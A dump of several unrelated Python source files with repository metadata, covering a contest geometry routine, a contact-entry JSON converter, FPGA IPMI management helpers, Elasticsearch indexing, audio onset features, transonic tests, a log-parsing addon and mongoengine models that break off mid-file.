| 35.5 | 73 | 0.595883 |
1ab4c7276d63c31305a0f58b3a30b10ad230ab33
| 725 |
py
|
Python
|
Contests/CCC/CCC '06 S3 - Tin Can Telephone.py
|
MastaCoder/Projects
|
ebb0a3134522b12f052fec8d753005f384adf1b1
|
[
"MIT"
] | 5 |
2018-10-11T01:55:40.000Z
|
2021-12-25T23:38:22.000Z
|
Contests/CCC/CCC '06 S3 - Tin Can Telephone.py
|
MastaCoder/mini_projects
|
ebb0a3134522b12f052fec8d753005f384adf1b1
|
[
"MIT"
] | null | null | null |
Contests/CCC/CCC '06 S3 - Tin Can Telephone.py
|
MastaCoder/mini_projects
|
ebb0a3134522b12f052fec8d753005f384adf1b1
|
[
"MIT"
] | 1 |
2019-02-22T14:42:50.000Z
|
2019-02-22T14:42:50.000Z
|
# I have no idea if this is actually functioning.
def line_intersection(l1, l2):
xdiff = (l1[0][0] - l1[1][0], l2[0][0] - l2[1][0])
ydiff = (l1[0][1] - l1[1][1], l2[0][1] - l2[1][1])
def det(a, b):
return a[0] * b[1] - a[1] * b[0]
div = det(xdiff, ydiff)
if div == 0:
return False
d = (det(*l1), det(*l2))
x = det(d, xdiff) / div
y = det(d, ydiff) / div
if x < min(l2[0][0], l2[1][0]) or x > max(l2[0][0], l2[1][0]) or y < min(l2[0][1], l2[1][1]) or y > max(l2[0][1], l2[1][1]):
return False
else:
return x,y
# 0 0 3 3
# 1
# 4 1 2 2 2 2 1 1 1
main_line = list(map(int, input().split()))
num = int(input())
print(line_intersection((A, B), (C, D)))
| 24.166667 | 128 | 0.489655 |
46e6e58e94f0e3a25d6fe545a26c83e5f8f5192a
| 9,535 |
py
|
Python
|
comp/pecoco/src/entry2json.py
|
cc13ny/all-in
|
bc0b01e44e121ea68724da16f25f7e24386c53de
|
[
"MIT"
] | 1 |
2015-12-16T04:01:03.000Z
|
2015-12-16T04:01:03.000Z
|
comp/pecoco/src/entry2json.py
|
cc13ny/all-in
|
bc0b01e44e121ea68724da16f25f7e24386c53de
|
[
"MIT"
] | 1 |
2016-02-09T06:00:07.000Z
|
2016-02-09T07:20:13.000Z
|
comp/pecoco/src/entry2json.py
|
cc13ny/all-in
|
bc0b01e44e121ea68724da16f25f7e24386c53de
|
[
"MIT"
] | 2 |
2019-06-27T09:07:26.000Z
|
2019-07-01T04:40:13.000Z
|
"""
This module is used to parse entries of personal information and write them as the formatted & valid JSON into an output file. Please check details of requirments from 'rolodex_instructions.pdf' in the root directory of this project.
"""
import json
import re
from collections import OrderedDict
ele_names = ['color', 'firstname', 'lastname', 'phonenumber', 'zipcode']
class Factory():
'''
Factory is the class as the set of 3 classes for this task: Normalizer, Validation, Converter
'''
def __init__(self):
"""
Construct a new 'Factory' object
:attr vld: Instance of Validation Object
:attr nlz: Instance of Normalizer Object
:attr cvt: Instance of Converter Object
:return: nothing
"""
self.vld = Validation()
self.nlz = Normalizer(self.vld)
self.cvt = Converter(self.vld, self.nlz)
class Normalizer():
def __init__(self, validation):
"""
Construct a new 'Normalizer' object
:param validation: Instance of Validation Object
:attr normfunc: a list of functions of Normalization for different elements of a valid entry
:attr vld: Instance of Validation Object
:return: nothing
"""
normfunc = [self.normColor, self.normName, self.normName, self.normPhoneNum, self.normZipCode]
self.normfunc = normfunc
self.vld = validation
def normColor(self, color):
"""
Normalize color
:param color: a string for color name
:return: a string without spaces of two ends
"""
return color.strip()
def normName(self, name):
"""
Normalize name
:param name: a string for person's firstname or lastname
:return: a string without spaces of two ends
"""
return name.strip()
def normPhoneNum(self, num):
"""
Normalize phone number
:param num: a string for phone number
:return: a formatted string like '888-888-8888' if num is valid. Otherwise, ''.
"""
num = num.strip()
if self.vld.validPhoneNum(num):
nl_num = ''.join(re.findall(r'\d+', num))
nl_num = nl_num[:3] + '-' + nl_num[3:6] + '-' + nl_num[6:10]
return nl_num
return ''
def normZipCode(self, code):
"""
Normalize zip code
:param code: a string for zip code
:return: a string without spaces
"""
return ''.join(code.split())
def normAll(self, ord_ent):
"""
Normalize all elements of an entry
:param ord_ents: a list of all ordered elements of an entry
:return: a list of all normalized & ordered elements of an entry
"""
nl_ord_ent = []
nf = self.normfunc
for i in range(len(ord_ent)):
nl_ord_ent.append(nf[i](ord_ent[i]))
return nl_ord_ent
class Validation():
def __init__(self):
"""
Construct a new 'Validation' object
:attr valfunc: a list of functions of Validation for different elements of an entry
:return: nothing
"""
valfunc = [self.validColor, self.validName, self.validName, self.validPhoneNum, self.validZipCode]
self.valfunc = valfunc
def validColor(self, color):
# We can create a set of color names.
# If 'color' is not in the set, return False
"""
Validate color
:param color: a string for color name
:return: True
"""
return True
def validName(self, name):
# We maybe need the validation for first & last name separately
# Maybe needed if required: return False if it contains any special char instead of '.'
"""
Validate name
:param name: a string for person's firstname or lastname
:return: False if it contains nothing or any digits. Otherwise, True.
"""
if name == '':
return False
if bool(re.search(r'\d', name)):
return False
return True
def validPhoneNum(self, num):
# Assumption
"""
Validate phone number
:param num: a string for phone number
:return: False if it doesn't contain exactly 10 digits. Otherwise, True.
"""
if len(''.join(re.findall(r'\d+', num))) == 10:
return True
return False
def validZipCode(self, code):
# Don't know any restriction for each number of zipcode.
# But I can check details via https://en.wikipedia.org/wiki/ZIP_code#Structure_and_allocation
"""
Validate zip code
:param code: a string for zip code
:return: False if it is not exactly 5 consecutive digits. Otherwise, True.
"""
if len(code) != 5:
return False
if not code.isdigit():
return False
return True
def validAll(self, nl_ord_ents):
"""
Validate all elements of an entry
:param nl_ord_ents: a list of all normalized & ordered elements of an entry
:return: False if any element is not valid. Otherwise, True
"""
vf = self.valfunc
for i in range(len(nl_ord_ents)):
if not vf[i](nl_ord_ents[i]):
return False
return True
class Converter():
def __init__(self, validation, normalizer):
"""
Construct a new 'Converter' object
:param validation: Instance of Validation Object
:param normalizer: Instance of Normalizer Object
:attr vld: Instance of Validation Object
:attr nlz: Instance of Normalizer Object
:return: nothing
"""
self.vld = validation
self.nlz = normalizer
def process(self, line):
"""
Process each row/ line/ entry of the input file. There're 6 steps for processing where some are missed if the line is invalid.
1. Check the number of elements is valid. It's valid if the number is 4 or 5. Otherwise, return None.
2. Decide which format it is (one of three formats). It's based on the idx of the phone number.
3. Reorder elements based on the corresponding pattern.
4. Normalize all elements of the orderd & valid entry.
5. Check if the entry is valid.
6. Contruct the mapping. The mapping is an ordered dict with the ordered keys ['color', 'firstname', 'lastname', 'phonenumber', 'zipcode'], and their corresponding elements from the entry
:param line: a row/ line/ entry of the input file
:return: None if the line is invalid. Otherwise, the mapping.
"""
# Check the number of elements is valid
ent = line.split(',')
nelemnts = len(ele_names)
if len(ent) != nelemnts and len(ent) != nelemnts - 1:
return None
# Decide which format it is (one of three formats)
if len(ent) == nelemnts - 1:
if len(ent[0].rsplit(None, 1)) != 2:
return None
[Firstname, Lastname] = ent[0].rsplit(None, 1)
ent = [Firstname, Lastname] + ent[1:]
phone_num_candidates = ent[2:5]
ptype = -1
for i in range(3):
if self.vld.validPhoneNum(phone_num_candidates[i]):
ptype = i
break
if ptype == -1:
return None
# Reorder elements based on the corresponding pattern
ptrns = [[3, 1, 0, 2, 4], [4, 0, 1, 3, 2], [2, 0, 1, 4, 3]]
ord_ent = [ent[idx] for idx in ptrns[ptype]]
# Normalize all elements of the orderd & valid entry
nl_ord_ent = self.nlz.normAll(ord_ent)
# Check if the entry is valid
if not self.vld.validAll(nl_ord_ent):
return None
# Contruct the mapping
mp = OrderedDict()
for i in range(len(nl_ord_ent)):
mp[ele_names[i]] = nl_ord_ent[i]
return mp
def ent2json(self, fname):
"""
Parse each line / entry of personal information from an input file, and write them as the formatted & valid JSON into an output file.
:param fname: the absolute or relative path of input file
:return: nothing
"""
res = OrderedDict([('entries', []), ('errors', [])])
with open(fname) as f:
lines = f.readlines()
for i in range(len(lines)):
mapping = self.process(lines[i])
if mapping is not None:
res['entries'].append(mapping)
else:
res['errors'].append(i)
if res['entries'] == []:
del res['entries']
else:
entries = sorted(res['entries'], key=lambda t: (t['lastname'], t['firstname']))
res['entries'] = entries
if res['errors'] == []:
del res['errors']
with open(fname[:-2] + 'out', 'wb') as outfile:
if res != OrderedDict():
json.dump(res, outfile, indent=2)
if __name__ == "__main__":
fac = Factory()
vld, nlz, cvt = fac.vld, fac.nlz, fac.cvt
print
'Please input the absoulte path of the input file'
fname = raw_input()
cvt.ent2json(fname)
| 29.611801 | 233 | 0.56581 |
03b1bdb95fcdfb32ef5d8620d14e914fa5b8814f
| 13,470 |
py
|
Python
|
Contrib-Microsoft/Olympus_rack_manager/python-ocs/commonapi/controls/manage_fpga.py
|
opencomputeproject/Rack-Manager
|
e1a61d3eeeba0ff655fe9c1301e8b510d9b2122a
|
[
"MIT"
] | 5 |
2019-11-11T07:57:26.000Z
|
2022-03-28T08:26:53.000Z
|
Contrib-Microsoft/Olympus_rack_manager/python-ocs/commonapi/controls/manage_fpga.py
|
opencomputeproject/Rack-Manager
|
e1a61d3eeeba0ff655fe9c1301e8b510d9b2122a
|
[
"MIT"
] | 3 |
2019-09-05T21:47:07.000Z
|
2019-09-17T18:10:45.000Z
|
Contrib-Microsoft/Olympus_rack_manager/python-ocs/commonapi/controls/manage_fpga.py
|
opencomputeproject/Rack-Manager
|
e1a61d3eeeba0ff655fe9c1301e8b510d9b2122a
|
[
"MIT"
] | 11 |
2019-07-20T00:16:32.000Z
|
2022-01-11T14:17:48.000Z
|
# Copyright (C) Microsoft Corporation. All rights reserved.
# This program is free software; you can redistribute it
# and/or modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#!/usr/bin/python
# -*- coding: utf-8 -*-
from utils import *
from ipmicmd_library import *
############################################################################################################
# FPGA set functions
############################################################################################################
def set_fpga_bypass(serverid, bypass):
if bypass == "Enabled":
return set_fpga_bypass_on(serverid)
elif bypass == "Disabled":
return set_fpga_bypass_off(serverid)
else:
return set_failure_dict("set_fpga_bypass invalid type {0}.".format(bypass),
completion_code.failure)
def set_fpga_bypass_on(serverid):
""" Set FPGA bypass mode on
"""
try:
interface = get_ipmi_interface(serverid, ["ocsoem", "fpgaaction", "setbypass"])
return parse_set_fpga_bypass(interface, "setbypass")
except Exception, e:
return set_failure_dict("set_fpga_bypass_on() Exception {0}".format(e), completion_code.failure)
def set_fpga_bypass_off(serverid):
""" Set FPGA bypass mode off
"""
try:
interface = get_ipmi_interface(serverid, ["ocsoem", "fpgaaction", "clearbypass"])
return parse_set_fpga_bypass(interface, "clearbypass")
except Exception, e:
return set_failure_dict("set_fpga_bypass_off() Exception {0}".format(e), completion_code.failure)
############################################################################################################
# FPGA get functions
############################################################################################################
def get_fpga_bypass_mode(serverid):
""" Read back FPGA bypass mode setting
"""
try:
interface = get_ipmi_interface(serverid, ["ocsoem", "fpgaread", "mode"])
return parse_get_fpga_bypass_mode(interface, "mode")
except Exception, e:
return set_failure_dict("get_fpga_bypass_mode() Exception {0}".format(e), completion_code.failure)
def get_fpga_health(serverid):
""" Read back FPGA health
"""
try:
interface = get_ipmi_interface(serverid, ["ocsoem", "fpgaread", "health"])
return parse_get_fpga_health(interface, "health")
except Exception, e:
return set_failure_dict("get_fpga_health() Exception {0}".format(e), completion_code.failure)
def get_fpga_temp(serverid):
""" Read back FPGA temperature
"""
try:
interface = get_ipmi_interface(serverid, ["ocsoem", "fpgaread", "temp"])
return parse_get_fpga_temp(interface, "temp")
except Exception, e:
return set_failure_dict("get_fpga_temp() Exception {0}".format(e), completion_code.failure)
def get_fpga_i2c_version(serverid):
""" Read back FPGA I2C version
"""
try:
interface = get_ipmi_interface(serverid, ["ocsoem", "fpgaread", "i2cversion"])
return parse_get_fpga_i2cversion(interface, "i2cversion")
except Exception, e:
return set_failure_dict("get_fpga_i2c_version() Exception {0}".format(e), completion_code.failure)
def get_fpga_assetinfo(serverid):
""" Read back product info area from FPGA FRU
"""
try:
interface = get_ipmi_interface(serverid, ["ocsoem", "fpgaread", "assetinfo"])
return parse_get_fpga_assetinfo(interface, "assetinfo")
except Exception, e:
return set_failure_dict("get_fpga_assetinfo() Exception {0}".format(e), completion_code.failure)
############################################################################################################
# FPGA parse output functions
############################################################################################################
def parse_set_fpga_bypass(interface, command):
try:
output = call_ipmi(interface, command)
if "ErrorCode" in output:
return set_failure_dict(("Failed to run IPMITool: " + output), completion_code.failure)
if output['status_code'] == 0:
return set_success_dict()
else:
error_data = output['stderr']
return set_failure_dict(error_data.split(":")[-1].strip(), completion_code.failure)
except Exception, e:
return set_failure_dict("parse_set_fpga_bypass() Exception {0}".format(e), completion_code.failure)
def parse_get_fpga_bypass_mode(interface, command):
try:
output = call_ipmi(interface, command)
if "ErrorCode" in output:
return set_failure_dict(("Failed to run IPMITool: " + output), completion_code.failure)
get_mode = {}
if output['status_code'] == 0:
get_mode_data = output['stdout'].split('\n')
# Removes empty strings from the list
get_mode_data = filter(None, get_mode_data)
get_mode[completion_code.cc_key] = completion_code.success
for string in get_mode_data:
if "Bypass Mode" in string:
get_mode["Bypass Mode"] = string.split(":")[-1].strip()
elif "User Logic Network" in string:
get_mode["User Logic Network"] = string.split(":")[-1].strip()
return get_mode
else:
error_data = output['stderr']
return set_failure_dict(error_data.split(":")[-1].strip(), completion_code.failure)
except Exception, e:
return set_failure_dict("parse_get_fpga_bypass_mode() Exception {0}".format(e), completion_code.failure)
def parse_get_fpga_temp(interface, command):
try:
output = call_ipmi(interface, command)
if "ErrorCode" in output:
return set_failure_dict(("Failed to run IPMITool: " + output), completion_code.failure)
get_temp = {}
if output['status_code'] == 0:
get_temp_data = output['stdout'].split('\n')
# Removes empty strings from the list
get_temp_data = filter(None, get_temp_data)
get_temp[completion_code.cc_key] = completion_code.success
for string in get_temp_data:
if "Temperature in Celsius" in string:
get_temp["Temperature in Celsius"] = string.split(":")[-1].strip()
return get_temp
else:
error_data = output['stderr']
return set_failure_dict(error_data.split(":")[-1].strip(), completion_code.failure)
except Exception, e:
return set_failure_dict("parse_get_fpga_temp() Exception {0}".format(e), completion_code.failure)
def parse_get_fpga_i2cversion(interface, command):
try:
output = call_ipmi(interface, command)
if "ErrorCode" in output:
return set_failure_dict(("Failed to run IPMITool: " + output), completion_code.failure)
get_ver = {}
if output['status_code'] == 0:
get_ver_data = output['stdout'].split('\n')
# Removes empty strings from the list
get_ver_data = filter(None, get_ver_data)
get_ver[completion_code.cc_key] = completion_code.success
for string in get_ver_data:
if "I2C Version" in string:
get_ver["I2C Version"] = string.split(":")[-1].strip()
return get_ver
else:
error_data = output['stderr']
return set_failure_dict(error_data.split(":")[-1].strip (), completion_code.failure)
except Exception, e:
return set_failure_dict("parse_get_fpga_i2cversion() Exception {0}".format(e), completion_code.failure)
def parse_get_fpga_health(interface, command):
try:
output = call_ipmi(interface, command)
if "ErrorCode" in output:
return set_failure_dict(("Failed to run IPMITool: " + output), completion_code.failure)
get_health = {}
if output['status_code'] == 0:
get_health_data = output['stdout'].split('\n')
# Removes empty strings from the list
get_health_data = filter(None, get_health_data)
get_health[completion_code.cc_key] = completion_code.success
for string in get_health_data:
if "PCIe HIP 0 Up" in string:
get_health["PCIe HIP 0 Up"] = string.split(":")[-1].strip()
elif "PCIe HIP 1 Up" in string:
get_health["PCIe HIP 1 Up"] = string.split(":")[-1].strip()
elif "40G Link 0 Up" in string:
get_health["40G Link 0 Up"] = string.split(":")[-1].strip()
elif "40G Link 0 Tx Activity" in string:
get_health["40G Link 0 Tx Activity"] = string.split(":")[-1].strip()
elif "40G Link 0 Rx Activity" in string:
get_health["40G Link 0 Rx Activity"] = string.split(":")[-1].strip()
elif "40G Link 1 Up" in string:
get_health["40G Link 1 Up"] = string.split(":")[-1].strip()
elif "40G Link 1 Tx Activity" in string:
get_health["40G Link 1 Tx Activity"] = string.split(":")[-1].strip()
elif "40G Link 1 Rx Activity" in string:
get_health["40G Link 1 Rx Activity"] = string.split(":")[-1].strip()
return get_health
else:
error_data = output['stderr']
return set_failure_dict(error_data.split(":")[-1].strip (), completion_code.failure)
except Exception, e:
return set_failure_dict("parse_get_fpga_health() Exception {0}".format(e), completion_code.failure)
def parse_get_fpga_assetinfo(interface, command):
try:
output = call_ipmi(interface, command)
if "ErrorCode" in output:
return set_failure_dict(("Failed to run IPMITool: " + output), completion_code.failure)
get_assetinfo = {}
if output['status_code'] == 0:
get_fru_data = output['stdout'].split('\n')
# Removes empty strings from the list
get_fru_data = filter(None, get_fru_data)
get_assetinfo[completion_code.cc_key] = completion_code.success
for string in get_fru_data:
if "Product Manufacturer" in string:
get_assetinfo["Product Manufacturer"] = string.split(":")[-1].strip()
elif "Product Name" in string:
get_assetinfo["Product Name"] = string.split(":")[-1].strip()
elif "Product Model Number" in string:
get_assetinfo["Product Model Number"] = string.split(":")[-1].strip()
elif "Product Version" in string:
get_assetinfo["Product Version"] = string.split(":")[-1].strip()
elif "Product Serial Number" in string:
get_assetinfo["Product Serial Number"] = string.split(":")[-1].strip()
elif "Product FRU File ID" in string:
get_assetinfo["Product FRU File ID"] = string.split(":")[-1].strip()
elif "Product Custom Field 1" in string:
get_assetinfo["Product Custom Field 1"] = string.split(":")[-1].strip()
elif "Product Custom Field 2" in string:
get_assetinfo["Product Custom Field 2"] = string.split(":")[-1].strip()
return get_assetinfo
else:
error_data = output['stderr']
return set_failure_dict(error_data.split(":")[-1].strip (), completion_code.failure)
except Exception, e:
return set_failure_dict("parse_get_fpga_assetinfo() Exception {0}".format(e), completion_code.failure)
| 45.201342 | 113 | 0.518486 |
208337278275bee9002af264c40fa5bf3f08d11d
| 498 |
py
|
Python
|
2-resources/_PYTHON/code-examples-master/elasticsearch/python/es_index_document.py
|
eengineergz/Lambda
|
1fe511f7ef550aed998b75c18a432abf6ab41c5f
|
[
"MIT"
] | null | null | null |
2-resources/_PYTHON/code-examples-master/elasticsearch/python/es_index_document.py
|
eengineergz/Lambda
|
1fe511f7ef550aed998b75c18a432abf6ab41c5f
|
[
"MIT"
] | null | null | null |
2-resources/_PYTHON/code-examples-master/elasticsearch/python/es_index_document.py
|
eengineergz/Lambda
|
1fe511f7ef550aed998b75c18a432abf6ab41c5f
|
[
"MIT"
] | 1 |
2021-11-05T07:48:26.000Z
|
2021-11-05T07:48:26.000Z
|
from elasticsearch import Elasticsearch
es = Elasticsearch(
hosts = [{'host': 'es-domain.es.amazonaws.com', 'port': 443}],
use_ssl=True, verify_certs=True
)
document = {"name": "ruan", "surname": "bekker"}
response = es.index(index='my-index', doc_type='_doc', body=document)
# response
# {'_index': 'my-index', '_type': '_doc', '_id': 'Mlq9FHMB6HS5JLZeF5Rs', '_version': 1, 'result': 'created', '_shards': {'total': 2, 'successful': 1, 'failed': 0}, '_seq_no': 0, '_primary_term': 1}
| 35.571429 | 197 | 0.650602 |
b35829957542c4d9b959727d95d83e5c13e2f5b0
| 3,344 |
py
|
Python
|
large_vocab_adt_dafx2018/features.py
|
mcartwright/dafx2018_adt
|
057ac6b1e39cd0c80554d52535cc9d88b6316c74
|
[
"BSD-2-Clause"
] | 6 |
2019-02-28T05:43:58.000Z
|
2021-03-02T17:05:13.000Z
|
large_vocab_adt_dafx2018/features.py
|
mcartwright/dafx2018_adt
|
057ac6b1e39cd0c80554d52535cc9d88b6316c74
|
[
"BSD-2-Clause"
] | null | null | null |
large_vocab_adt_dafx2018/features.py
|
mcartwright/dafx2018_adt
|
057ac6b1e39cd0c80554d52535cc9d88b6316c74
|
[
"BSD-2-Clause"
] | 1 |
2020-02-07T17:10:40.000Z
|
2020-02-07T17:10:40.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import division
import librosa
import scipy.signal
import numpy as np
from .utils import read_audio
FRAME_INTERVAL = 0.01 # s
def cq_matrix(bins_per_octave, num_bins, f_min, fft_len, sr):
"""
Compute center frequencies of the log-spaced filterbank
Parameters
----------
bins_per_octave : int
num_bins : int
f_min : float
fft_len : int
sr : float
Returns
-------
c_mat
"""
# note range goes from -1 to bpo*num_oct for boundary issues
f_cq = f_min * 2 ** ((np.arange(-1, num_bins+1)) / bins_per_octave)
# centers in bins
kc = np.round(f_cq * (fft_len / sr)).astype(int)
c_mat = np.zeros([num_bins, int(np.round(fft_len / 2))])
for k in range(1, kc.shape[0]-1):
l1 = kc[k]-kc[k-1]
w1 = scipy.signal.triang((l1 * 2) + 1)
l2 = kc[k+1]-kc[k]
w2 = scipy.signal.triang((l2 * 2) + 1)
wk = np.hstack([w1[0:l1], w2[l2:]]) # concatenate two halves
c_mat[k-1, kc[k-1]:(kc[k+1]+1)] = wk / np.sum(wk) # normalized to unit sum;
return c_mat
def onset_detection_fn(x, f_win_size, f_hop_size, f_bins_per_octave, f_octaves, f_fmin, sr, mean_filter_size):
"""
Filter bank for onset pattern calculation
"""
# calculate frequency constant-q transform
f_win = scipy.signal.hanning(f_win_size)
x_spec = librosa.stft(x,
n_fft=f_win_size,
hop_length=f_hop_size,
win_length=f_win_size,
window=f_win)
x_spec = np.abs(x_spec) / (2 * np.sum(f_win))
f_cq_mat = cq_matrix(f_bins_per_octave, f_octaves * f_bins_per_octave, f_fmin, f_win_size, sr)
x_cq_spec = np.dot(f_cq_mat, x_spec[:-1, :])
# subtract moving mean
b = np.concatenate([[1], np.ones(mean_filter_size, dtype=float) / -mean_filter_size])
od_fun = scipy.signal.lfilter(b, 1, x_cq_spec, axis=1)
# half-wave rectify
od_fun = np.maximum(0, od_fun)
# post-process OPs
od_fun = np.log10(1 + 1000*od_fun)
return od_fun, x_cq_spec
def extract_features(audio_file_path, sr=22050, channel=1):
x, sr = read_audio(audio_file_path, mono=True, sr=sr)
f_win_size = 1024
f_hop_size = int(round(FRAME_INTERVAL * sr))
f_bins_per_octave = 8
f_octaves = 8
f_fmin = 40
mean_filter_size = 22
# normalize
x /= np.max(np.abs(x))
od_fun, x_cq_spec = onset_detection_fn(x,
f_win_size,
f_hop_size,
f_bins_per_octave,
f_octaves,
f_fmin,
sr,
mean_filter_size)
logf_stft = librosa.power_to_db(x_cq_spec).astype('float32')
od_fun = np.abs(od_fun).astype('float32')
# reshape for model
ms_input_array = np.moveaxis(logf_stft, 1, 0)
ms_input_array = np.expand_dims(ms_input_array, axis=2)
os_input_array = np.moveaxis(od_fun, 1, 0)
os_input_array = np.clip(os_input_array / 2.25, 0, 1)
os_input_array = np.expand_dims(os_input_array, axis=2)
return ms_input_array, os_input_array, sr
| 31.54717 | 110 | 0.58134 |
2fc751a07689597eb520fe0eb4337776e6ff00df
| 16 |
py
|
Python
|
python/coursera_python/MICHIGAN/DataStructures/test/range.py
|
SayanGhoshBDA/code-backup
|
8b6135facc0e598e9686b2e8eb2d69dd68198b80
|
[
"MIT"
] | 16 |
2018-11-26T08:39:42.000Z
|
2019-05-08T10:09:52.000Z
|
python/coursera_python/MICHIGAN/DataStructures/test/range.py
|
SayanGhoshBDA/code-backup
|
8b6135facc0e598e9686b2e8eb2d69dd68198b80
|
[
"MIT"
] | 8 |
2020-05-04T06:29:26.000Z
|
2022-02-12T05:33:16.000Z
|
python/coursera_python/MICHIGAN/DataStructures/test/range.py
|
SayanGhoshBDA/code-backup
|
8b6135facc0e598e9686b2e8eb2d69dd68198b80
|
[
"MIT"
] | 5 |
2020-02-11T16:02:21.000Z
|
2021-02-05T07:48:30.000Z
|
print(range(4))
| 8 | 15 | 0.6875 |
443364b93cce01dcca1b820f92bf7a1836a52bac
| 318 |
py
|
Python
|
python/en/archive/dropbox/miscellaneous_python_files/test.py
|
aimldl/coding
|
70ddbfaa454ab92fd072ee8dc614ecc330b34a70
|
[
"MIT"
] | null | null | null |
python/en/archive/dropbox/miscellaneous_python_files/test.py
|
aimldl/coding
|
70ddbfaa454ab92fd072ee8dc614ecc330b34a70
|
[
"MIT"
] | null | null | null |
python/en/archive/dropbox/miscellaneous_python_files/test.py
|
aimldl/coding
|
70ddbfaa454ab92fd072ee8dc614ecc330b34a70
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Sat Aug 17 19:39:45 2019
@author: aimldl
"""
import numpy as np
print( np.random.choice(5, 3, replace=False ) )
a = ['pooh', 'rabbit', 'piglet', 'Christopher']
print( np.random.choice(a, 3, replace=False ) )
print( np.random.choice(8, 32, replace=False ) )
| 18.705882 | 49 | 0.603774 |
448f63f63da035112046dadf9a070bc75195cdd7
| 1,247 |
py
|
Python
|
transonic/backends/test_cython.py
|
fluiddyn/transonic
|
a460e9f6d1139f79b668cb3306d1e8a7e190b72d
|
[
"BSD-3-Clause"
] | 88 |
2019-01-08T16:39:08.000Z
|
2022-02-06T14:19:23.000Z
|
transonic/backends/test_cython.py
|
fluiddyn/transonic
|
a460e9f6d1139f79b668cb3306d1e8a7e190b72d
|
[
"BSD-3-Clause"
] | 13 |
2019-06-20T15:53:10.000Z
|
2021-02-09T11:03:29.000Z
|
transonic/backends/test_cython.py
|
fluiddyn/transonic
|
a460e9f6d1139f79b668cb3306d1e8a7e190b72d
|
[
"BSD-3-Clause"
] | 1 |
2019-11-05T03:03:14.000Z
|
2019-11-05T03:03:14.000Z
|
import numpy as np
from transonic import Array, const
from transonic.backends import backends
backend = backends["cython"]
type_formatter = backend.type_formatter
def compare(result, dtype, ndim, memview, mem_layout=None, positive_indices=None):
A = Array[dtype, ndim, memview, mem_layout, positive_indices]
assert A.format_as_backend_type(type_formatter) == result
def test_memview():
memview = "memview"
compare("np.int_t[:, ::1]", int, "2d", memview, "C")
compare("np.int_t[:, :, :]", int, "3d", memview, "strided")
compare("np.int32_t[::1, :]", np.int32, "2d", memview, "F")
def test_array():
memview = None
compare('np.ndarray[np.int_t, ndim=2, mode="c"]', int, "2d", memview, "C")
compare("np.ndarray[np.int_t, ndim=3]", int, "3d", memview, "strided")
compare(
'np.ndarray[np.int32_t, ndim=2, mode="f"]', np.int32, "2d", memview, "F"
)
compare(
"np.ndarray[np.int_t, ndim=2, negative_indices=False]",
int,
"2d",
memview,
positive_indices="positive_indices",
)
def test_const():
A = Array[int, "2d"]
assert "const " + A.format_as_backend_type(type_formatter) == const(
A
).format_as_backend_type(type_formatter)
| 29 | 82 | 0.639936 |
928c78b0fe1b26f67912ffec8a40ea763b8c7622
| 2,173 |
py
|
Python
|
jumeaux/addons/log2reqs/plain.py
|
ihatov08/jumeaux
|
7d983474df4b6dcfa57ea1a66901fbc99ebababa
|
[
"MIT"
] | 11 |
2017-10-02T01:29:12.000Z
|
2022-03-31T08:37:22.000Z
|
jumeaux/addons/log2reqs/plain.py
|
ihatov08/jumeaux
|
7d983474df4b6dcfa57ea1a66901fbc99ebababa
|
[
"MIT"
] | 79 |
2017-07-16T14:47:17.000Z
|
2022-03-31T08:49:14.000Z
|
jumeaux/addons/log2reqs/plain.py
|
ihatov08/jumeaux
|
7d983474df4b6dcfa57ea1a66901fbc99ebababa
|
[
"MIT"
] | 2 |
2019-01-28T06:11:58.000Z
|
2021-01-25T07:21:21.000Z
|
# -*- coding:utf-8 -*-
import urllib.parse as urlparser
from typing import Dict, List
from owlmixin import OwlMixin, TOption
from owlmixin.owlcollections import TList
from jumeaux.addons.log2reqs import Log2ReqsExecutor
from jumeaux.logger import Logger
from jumeaux.models import Request, Log2ReqsAddOnPayload
logger: Logger = Logger(__name__)
LOG_PREFIX = "[log2reqs/plain]"
class Config(OwlMixin):
encoding: str = "utf8"
keep_blank: bool = False
candidate_for_url_encodings: TList[str] = []
def guess_url_encoding(query_str: str, encodings: TList[str]) -> TOption[str]:
for e in encodings:
try:
urlparser.parse_qs(query_str, encoding=e, errors="strict")
return TOption(e)
except UnicodeDecodeError:
pass
return TOption(None)
class Executor(Log2ReqsExecutor):
def __init__(self, config: dict):
self.config: Config = Config.from_dict(config or {})
def exec(self, payload: Log2ReqsAddOnPayload) -> TList[Request]:
def line_to_request(line: str, seq: int) -> Request:
logger.debug(f"{LOG_PREFIX} ---- {seq} ----")
path = line.split("?")[0]
logger.debug(f"{LOG_PREFIX} [path] {path}")
url_encoding = "utf-8"
qs: Dict[str, List[str]] = {}
if len(line.split("?")) > 1:
url_encoding = guess_url_encoding(
line.split("?")[1], self.config.candidate_for_url_encodings
).get_or("utf-8")
qs = urlparser.parse_qs(
line.split("?")[1],
keep_blank_values=self.config.keep_blank,
encoding=url_encoding,
)
logger.debug(f"{LOG_PREFIX} [qs] ({url_encoding}) {qs}")
return Request.from_dict(
{"path": path, "qs": qs, "headers": {}, "url_encoding": url_encoding}
)
with open(payload.file, encoding=self.config.encoding) as f:
requests: TList[Request] = TList([x.rstrip() for x in f if x != "\n"]).emap(
lambda x, i: line_to_request(x, i)
)
return requests
| 31.955882 | 88 | 0.591809 |
47289bd6c744dd7fccc3402945aabbba4a9bbc35
| 22,462 |
py
|
Python
|
examples/test/generated/oss.py
|
Jumpscale/web
|
8e8ec2ce01f3105c7647ee8a0c90af09311cbbeb
|
[
"Apache-2.0"
] | 1 |
2015-10-26T10:38:32.000Z
|
2015-10-26T10:38:32.000Z
|
examples/test/generated/oss.py
|
Jumpscale/web
|
8e8ec2ce01f3105c7647ee8a0c90af09311cbbeb
|
[
"Apache-2.0"
] | null | null | null |
examples/test/generated/oss.py
|
Jumpscale/web
|
8e8ec2ce01f3105c7647ee8a0c90af09311cbbeb
|
[
"Apache-2.0"
] | null | null | null |
from mongoengine import *
classes=[]
class oss_comment(Document):
comment = StringField(required=True)
time = IntField(required=True,help_text='epoch')
author = IntField(required=True,help_text=' who created comment')
author_name = StringField(required=True,help_text=' who created comment')
id = IntField(required=True,help_text='Auto generated id @optional')
classes.append(oss_comment)
class oss_componenttype(Document):
type = StringField(required=True)
description = StringField(required=True)
supportremarks = StringField(required=True)
id = IntField(required=True,help_text='Auto generated id @optional')
classes.append(oss_componenttype)
class oss_sprint(Document):
id = IntField(required=True)
name = StringField(required=True)
description = StringField(required=True)
